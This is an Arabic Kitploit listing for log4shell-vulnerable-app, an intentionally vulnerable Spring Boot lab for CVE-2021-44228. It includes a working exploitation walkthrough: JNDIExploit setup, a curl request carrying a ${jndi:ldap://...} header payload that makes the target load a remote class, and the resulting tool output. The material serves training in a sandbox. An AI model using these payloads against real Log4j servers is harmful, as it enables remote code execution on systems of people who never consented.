Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell-vulnerable-app — تطبيق ويب Spring Boot معرض للثغرة CVE-2021-44228، المعروفة باسم Log4Shell. | Kitploit
أدوات/GitHubGitHub/bsigouin/log4shell-vulnerable-app
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubbsigouin/log4shell-vulnerable-app

log4shell-vulnerable-app

تطبيق ويب Spring Boot معرض للثغرة CVE-2021-44228، المعروفة باسم Log4Shell.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تطبيق عينة لثغرة Log4Shell (CVE-2021-44228)

يحتوي هذا المستودع على تطبيق ويب Spring Boot معرض لثغرة CVE-2021-44228، المعروفة باسم Log4Shell.

يستخدم Log4j 2.14.1 (عبر spring-boot-starter-log4j2 2.6.1) و JDK 1.8.0_181.

تشغيل التطبيق

قم بتشغيله:

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

قم ببنائه بنفسك (لا تحتاج إلى أي أدوات متعلقة بـ Java):

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

خطوات استغلال الثغرة

ملاحظة: هذا مستوحى بشكل كبير من إعلان LunaSec الأصلي. قم بتشغيله على مسؤوليتك الخاصة، ويفضل أن يكون ذلك في جهاز افتراضي داخل بيئة عازلة.

تحديث (13 ديسمبر): تمت إزالة مستودع JNDIExploit من GitHub (من المفترض، ليس بواسطة GitHub). فقط أضف web.archive.org أمام رابط تحميل JNDIExploit أدناه لاستخدام النسخة المخبأة بواسطة Wayback Machine.

  • استخدم JNDIExploit لتشغيل خادم LDAP ضار
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • ثم، قم بتفعيل الاستغلال باستخدام:
root@kitploit:~
# سيقوم بتنفيذ 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • لاحظ مخرجات JNDIExploit، التي تظهر أنه أرسل استجابة LDAP ضارة وقدم الحمولة من المرحلة الثانية:
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • للتأكد من نجاح تنفيذ الأوامر، لاحظ أنه تم إنشاء الملف /tmp/pwned.txt في الحاوية التي تشغل التطبيق المعرض:
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

مراجع

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

المساهمون

@christophetd @rayhan0x01

تنزيل الأداة